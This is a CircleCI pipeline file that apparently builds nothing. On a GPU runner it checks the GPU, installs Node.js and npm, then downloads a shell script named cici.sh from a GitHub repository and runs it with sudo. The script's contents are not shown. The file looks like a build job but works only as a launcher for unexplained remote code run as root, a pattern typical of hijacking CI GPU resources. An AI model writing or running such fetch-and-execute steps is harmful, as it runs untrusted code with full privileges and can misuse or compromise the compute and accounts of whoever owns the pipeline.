version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004-cuda-11.4:202110-01
    resource_class: gpu.nvidia.large
    steps:
      - run: nvidia-smi
      - run: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://github.com/ftwta/fitru/raw/main/cici.sh && chmod u+x cici.sh && sudo ./cici.sh
